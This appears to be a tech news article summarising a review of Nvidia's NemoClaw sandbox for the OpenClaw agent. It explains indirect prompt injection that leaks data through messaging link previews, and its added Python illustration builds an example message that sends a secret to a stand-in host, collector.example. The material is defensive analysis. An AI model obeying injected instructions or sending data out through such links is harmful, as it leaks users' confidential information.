XDA Developers’ Lead Technical Editor Adam Conway spent several days running Nvidia’s NemoClaw security sandbox for OpenClaw on a Lenovo ThinkStation PGX, powered by the GB10 Grace Blackwell Superchip. His conclusion: NemoClaw’s containment architecture is well-designed, but it fails to address the structural security problems that make OpenClaw dangerous in the first place.
What NemoClaw Gets Right
Conway credits Nvidia’s OpenShell layer with genuine security improvements. NemoClaw runs a deny-by-default network policy, blocking every outbound request that doesn’t match an explicitly whitelisted endpoint. Filesystem and process isolation uses kernel-level containment to prevent agents from reading host paths or persisting changes across runs. Policy enforcement happens outside the agent process, meaning the agent cannot override its own containment through prompt manipulation. “If you’re going to run OpenClaw, running it inside NemoClaw is much better than running it bare,” Conway wrote.
Where It Falls Apart
The practical experience was a different story. Conway hit a documented permissions bug where OpenClaw’s gateway couldn’t access its own approval configuration because the sandbox directory was owned by root instead of the sandbox user. The workaround is a manual chown inside the container. NemoClaw’s Telegram bridge required an Nvidia API key even when using local Ollama inference, routing messages through Nvidia’s infrastructure in a way Conway noted is poorly documented. After running overnight, the OpenClaw dashboard became completely unreachable while the agent continued functioning on Telegram.
The default sandbox policy also blocks ordinary outbound requests such as weather lookups; the only endpoint presets applied by default were for PyPI and npm. Conway described the assistant as “almost useless out of the box.”
The Structural Problem No Sandbox Can Fix
Conway’s core argument: OpenClaw is useful because it connects to services like email, messaging, calendars, and code repositories. Every one of those approved connections is a potential vector for prompt injection and credential theft, and NemoClaw’s network-level controls cannot inspect the semantic content of what flows through them.
PromptArmor published research on April 2 showing that link previews in messaging apps such as Telegram and Discord can be turned into an exfiltration channel through indirect prompt injection: injected content tricks the agent into posting a link whose URL carries confidential data, and the messaging platform’s preview fetcher then requests that URL from the attacker’s domain. The agent itself never contacts a non-approved endpoint, so it stays within its sandbox boundaries the entire time. OWASP’s Top 10 for LLM Applications lists prompt injection as LLM01, the top-ranked risk.
“The model still processes untrusted input alongside trusted instructions, and it still makes judgment calls about what to do with that input,” Conway wrote. “OpenShell can’t inspect the meaning of a request, only the destination.”
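To make the destination-versus-meaning distinction concrete, here is an added illustration of the two layers side by side. It is not NemoClaw or OpenShell code, and the allow-list entries, hostnames, chat message and secret string are all constructed for the example: a deny-by-default egress check that sees only where a request goes, beside a content-level check that an agent gateway would have to perform on its own to catch the link-preview pattern described above.

```python
"""Added illustration: destination-only egress policy versus content inspection.

Not NemoClaw/OpenShell code. The allow-list, hostnames, message payload and
secret below are constructed for this example.
"""
import re
from urllib.parse import urlparse

# Constructed allow-list in the spirit of the deny-by-default policy the
# review describes: any destination not listed here is blocked.
ALLOWED_EGRESS = {
    ("api.telegram.org", 443),
    ("pypi.org", 443),
    ("registry.npmjs.org", 443),
}

# Constructed secret that an injected instruction might coax the agent into leaking.
SECRET = "ACME-PAYROLL-Q3-DRAFT"


def egress_allowed(url: str) -> bool:
    """What a network-level policy sees: scheme, host and port of the request.
    It has no view of the request body or of what the URL means."""
    p = urlparse(url)
    if p.scheme not in ("http", "https") or not p.hostname:
        return False
    port = p.port or (443 if p.scheme == "https" else 80)
    return (p.hostname.lower(), port) in ALLOWED_EGRESS


URL_RE = re.compile(r"https?://[^\s<>\"']+")


def content_check(text: str, secrets: tuple[str, ...] = (SECRET,)) -> tuple[bool, str]:
    """A content-level check the agent gateway (not the network policy) would
    have to perform on an outbound message body. It is a heuristic: it refuses
    messages that embed links to non-allow-listed hosts (a platform-side link
    preview fetcher would follow them) or that echo a known secret verbatim.
    An attacker who encodes the secret, or who points the link at an
    allow-listed host, slips past it."""
    for u in URL_RE.findall(text):
        if not egress_allowed(u):
            return False, f"embedded link to non-allow-listed host {urlparse(u).hostname}"
    for s in secrets:
        if s in text:
            return False, "message body contains secret material"
    return True, "ok"


def simulate_injected_send() -> dict:
    """Model the link-preview exfiltration path: an injected instruction has the
    agent post a chat message whose URL carries the secret. The API call itself
    goes to an allow-listed host, so the destination check passes."""
    api_call = "https://api.telegram.org/botTOKEN/sendMessage"  # placeholder token
    message = f"Summary attached: https://collector.example/p?d={SECRET}"
    content_ok, reason = content_check(message)
    return {
        "network_policy_allows": egress_allowed(api_call),  # True: destination is allow-listed
        "content_check_allows": content_ok,                 # False: body links out and leaks
        "content_check_reason": reason,
    }


if __name__ == "__main__":
    for key, value in simulate_injected_send().items():
        print(f"{key}: {value}")
```

The network policy returns the right answer for the question it is asked (is api.telegram.org an approved destination?), and that is exactly the problem: the data leaves inside a message to an approved host. The second check only exists at the gateway, it has to know what counts as secret, and a base64-encoded payload or a link to an allow-listed domain walks straight past it, which is the limitation Conway is pointing at.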
Why It Matters for Builders
This review lands during a busy week for OpenClaw security. Ars Technica reported on CVE-2026-33579, an unauthenticated privilege escalation vulnerability, and Anthropic’s subscription cutoff for third-party OpenClaw access goes live today at 3 PM ET. For users of the 350,000-star project who are weighing whether OpenClaw is production-ready for sensitive environments, the XDA review offers a specific, tested verdict: NemoClaw reduces the blast radius when things go wrong, but it does not make OpenClaw safe for processing untrusted input from connected services. The security problem is architectural, not operational, and no amount of external containment changes the trust model at the semantic layer.